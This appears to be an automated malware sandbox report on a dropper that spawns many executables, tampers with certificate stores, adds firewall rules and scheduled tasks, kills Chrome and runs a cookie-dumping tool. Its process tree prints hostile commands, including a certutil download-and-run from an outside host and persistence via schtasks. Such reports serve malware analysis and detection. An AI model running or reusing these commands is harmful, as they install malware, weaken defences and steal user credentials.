233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	bfgCQBkJldfvK7hOSpVN1_S0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	bfgCQBkJldfvK7hOSpVN1_S0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	File.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	File.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exe

pid	process
1800	pub2.exe
1800	pub2.exe
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1284
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

1800 pub2.exe

pid	process
1284

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Install.exetaskkill.exeGraphics.exebfgCQBkJldfvK7hOSpVN1_S0.exe

description	pid	process
Token: SeCreateTokenPrivilege	1568	Install.exe
Token: SeAssignPrimaryTokenPrivilege	1568	Install.exe
Token: SeLockMemoryPrivilege	1568	Install.exe
Token: SeIncreaseQuotaPrivilege	1568	Install.exe
Token: SeMachineAccountPrivilege	1568	Install.exe
Token: SeTcbPrivilege	1568	Install.exe
Token: SeSecurityPrivilege	1568	Install.exe
Token: SeTakeOwnershipPrivilege	1568	Install.exe
Token: SeLoadDriverPrivilege	1568	Install.exe
Token: SeSystemProfilePrivilege	1568	Install.exe
Token: SeSystemtimePrivilege	1568	Install.exe
Token: SeProfSingleProcessPrivilege	1568	Install.exe
Token: SeIncBasePriorityPrivilege	1568	Install.exe
Token: SeCreatePagefilePrivilege	1568	Install.exe
Token: SeCreatePermanentPrivilege	1568	Install.exe
Token: SeBackupPrivilege	1568	Install.exe
Token: SeRestorePrivilege	1568	Install.exe
Token: SeShutdownPrivilege	1568	Install.exe
Token: SeDebugPrivilege	1568	Install.exe
Token: SeAuditPrivilege	1568	Install.exe
Token: SeSystemEnvironmentPrivilege	1568	Install.exe
Token: SeChangeNotifyPrivilege	1568	Install.exe
Token: SeRemoteShutdownPrivilege	1568	Install.exe
Token: SeUndockPrivilege	1568	Install.exe
Token: SeSyncAgentPrivilege	1568	Install.exe
Token: SeEnableDelegationPrivilege	1568	Install.exe
Token: SeManageVolumePrivilege	1568	Install.exe
Token: SeImpersonatePrivilege	1568	Install.exe
Token: SeCreateGlobalPrivilege	1568	Install.exe
Token: 31	1568	Install.exe
Token: 32	1568	Install.exe
Token: 33	1568	Install.exe
Token: 34	1568	Install.exe
Token: 35	1568	Install.exe
Token: SeDebugPrivilege	1044	taskkill.exe
Token: SeShutdownPrivilege	1284
Token: SeDebugPrivilege	1656	Graphics.exe
Token: SeImpersonatePrivilege	1656	Graphics.exe
Token: SeCreateTokenPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeAssignPrimaryTokenPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeLockMemoryPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeIncreaseQuotaPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeMachineAccountPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeTcbPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeSecurityPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeTakeOwnershipPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeLoadDriverPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeSystemProfilePrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeSystemtimePrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeProfSingleProcessPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeIncBasePriorityPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeCreatePagefilePrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeCreatePermanentPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeBackupPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeRestorePrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeShutdownPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeDebugPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeAuditPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeSystemEnvironmentPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeChangeNotifyPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeRemoteShutdownPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeUndockPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeSyncAgentPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe
Token: SeEnableDelegationPrivilege	2352	bfgCQBkJldfvK7hOSpVN1_S0.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

Accostarmi.exe.pif

pid process

1284
1284
2792 Accostarmi.exe.pif
2792 Accostarmi.exe.pif
2792 Accostarmi.exe.pif
2792 Accostarmi.exe.pif
Suspicious use of SendNotifyMessage 6 IoCs

Processes:

Accostarmi.exe.pif

pid process

1284
1284
2792 Accostarmi.exe.pif
2792 Accostarmi.exe.pif
2792 Accostarmi.exe.pif
2792 Accostarmi.exe.pif

pid	process
1284
1284
2792	Accostarmi.exe.pif
2792	Accostarmi.exe.pif
2792	Accostarmi.exe.pif
2792	Accostarmi.exe.pif

pid	process
1284
1284
2792	Accostarmi.exe.pif
2792	Accostarmi.exe.pif
2792	Accostarmi.exe.pif
2792	Accostarmi.exe.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exeFiles.exeInstall.execmd.exeGraphics.execmd.exeFile.exe

description	pid	process	target process
PID 1900 wrote to memory of 768	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	SoCleanInst.exe
PID 1900 wrote to memory of 768	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	SoCleanInst.exe
PID 1900 wrote to memory of 768	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	SoCleanInst.exe
PID 1900 wrote to memory of 768	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	SoCleanInst.exe
PID 1900 wrote to memory of 1116	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	md9_1sjm.exe
PID 1900 wrote to memory of 1116	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	md9_1sjm.exe
PID 1900 wrote to memory of 1116	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	md9_1sjm.exe
PID 1900 wrote to memory of 1116	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	md9_1sjm.exe
PID 1900 wrote to memory of 840	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Folder.exe
PID 1900 wrote to memory of 840	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Folder.exe
PID 1900 wrote to memory of 840	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Folder.exe
PID 1900 wrote to memory of 840	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Folder.exe
PID 1900 wrote to memory of 1656	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Graphics.exe
PID 1900 wrote to memory of 1656	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Graphics.exe
PID 1900 wrote to memory of 1656	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Graphics.exe
PID 1900 wrote to memory of 1656	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Graphics.exe
PID 1900 wrote to memory of 1376	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Updbdate.exe
PID 1900 wrote to memory of 1376	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Updbdate.exe
PID 1900 wrote to memory of 1376	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Updbdate.exe
PID 1900 wrote to memory of 1376	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Updbdate.exe
PID 1900 wrote to memory of 1568	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Install.exe
PID 1900 wrote to memory of 1568	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Install.exe
PID 1900 wrote to memory of 1568	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Install.exe
PID 1900 wrote to memory of 1568	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Install.exe
PID 1900 wrote to memory of 1568	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Install.exe
PID 1900 wrote to memory of 1568	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Install.exe
PID 1900 wrote to memory of 1568	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Install.exe
PID 1900 wrote to memory of 1200	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Files.exe
PID 1900 wrote to memory of 1200	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Files.exe
PID 1900 wrote to memory of 1200	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Files.exe
PID 1900 wrote to memory of 1200	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	Files.exe
PID 1900 wrote to memory of 1800	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	pub2.exe
PID 1900 wrote to memory of 1800	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	pub2.exe
PID 1900 wrote to memory of 1800	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	pub2.exe
PID 1900 wrote to memory of 1800	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	pub2.exe
PID 1900 wrote to memory of 1308	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	File.exe
PID 1900 wrote to memory of 1308	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	File.exe
PID 1900 wrote to memory of 1308	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	File.exe
PID 1900 wrote to memory of 1308	1900	607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe	File.exe
PID 1200 wrote to memory of 1876	1200	Files.exe	jfiag3g_gg.exe
PID 1200 wrote to memory of 1876	1200	Files.exe	jfiag3g_gg.exe
PID 1200 wrote to memory of 1876	1200	Files.exe	jfiag3g_gg.exe
PID 1200 wrote to memory of 1876	1200	Files.exe	jfiag3g_gg.exe
PID 1568 wrote to memory of 1512	1568	Install.exe	cmd.exe
PID 1568 wrote to memory of 1512	1568	Install.exe	cmd.exe
PID 1568 wrote to memory of 1512	1568	Install.exe	cmd.exe
PID 1568 wrote to memory of 1512	1568	Install.exe	cmd.exe
PID 1512 wrote to memory of 1044	1512	cmd.exe	taskkill.exe
PID 1512 wrote to memory of 1044	1512	cmd.exe	taskkill.exe
PID 1512 wrote to memory of 1044	1512	cmd.exe	taskkill.exe
PID 1512 wrote to memory of 1044	1512	cmd.exe	taskkill.exe
PID 1200 wrote to memory of 1996	1200	Files.exe	jfiag3g_gg.exe
PID 1200 wrote to memory of 1996	1200	Files.exe	jfiag3g_gg.exe
PID 1200 wrote to memory of 1996	1200	Files.exe	jfiag3g_gg.exe
PID 1200 wrote to memory of 1996	1200	Files.exe	jfiag3g_gg.exe
PID 1088 wrote to memory of 1380	1088	Graphics.exe	cmd.exe
PID 1088 wrote to memory of 1380	1088	Graphics.exe	cmd.exe
PID 1088 wrote to memory of 1380	1088	Graphics.exe	cmd.exe
PID 1088 wrote to memory of 1380	1088	Graphics.exe	cmd.exe
PID 1380 wrote to memory of 1444	1380	cmd.exe	netsh.exe
PID 1380 wrote to memory of 1444	1380	cmd.exe	netsh.exe
PID 1380 wrote to memory of 1444	1380	cmd.exe	netsh.exe
PID 1308 wrote to memory of 1464	1308	File.exe	eEVu3hUYG3xvmtPZ8eN5X3r6.exe
PID 1308 wrote to memory of 1464	1308	File.exe	eEVu3hUYG3xvmtPZ8eN5X3r6.exe

C:\Users\Admin\AppData\Local\Temp\607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe
"C:\Users\Admin\AppData\Local\Temp\607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1900

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
PID:768

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
PID:1116

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:840

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies data under HKEY_USERS
PID:1444

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:308

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1184

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
5⤵
- Creates scheduled task(s)
PID:2568

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
5⤵
- Executes dropped EXE
PID:2024

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:1376

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1044

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1200

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:1876

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:1996

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1308

C:\Users\Admin\Pictures\Adobe Films\eEVu3hUYG3xvmtPZ8eN5X3r6.exe
"C:\Users\Admin\Pictures\Adobe Films\eEVu3hUYG3xvmtPZ8eN5X3r6.exe"
3⤵
- Executes dropped EXE
PID:1464

C:\Users\Admin\Pictures\Adobe Films\9tJIwLeuaxdk_JoJtJ4IawCE.exe
"C:\Users\Admin\Pictures\Adobe Films\9tJIwLeuaxdk_JoJtJ4IawCE.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1192

C:\Users\Admin\Documents\r3mKgks2grMJIrPR428GJ00d.exe
"C:\Users\Admin\Documents\r3mKgks2grMJIrPR428GJ00d.exe"
4⤵
- Executes dropped EXE
PID:2852

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2916

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2908

C:\Users\Admin\Pictures\Adobe Films\6HSh4Lu6KAVIZEubICHicFTo.exe
"C:\Users\Admin\Pictures\Adobe Films\6HSh4Lu6KAVIZEubICHicFTo.exe"
3⤵
- Executes dropped EXE
PID:772

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Netdhcpsvc\77FTyD6gK21dfSGhRqsixY3e.vbe"
4⤵
PID:2140

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Netdhcpsvc\jGDslx6begqObyzNRSfaWpJOf.bat" "
5⤵
PID:3000

C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe
"C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"
6⤵
- Executes dropped EXE
PID:3036

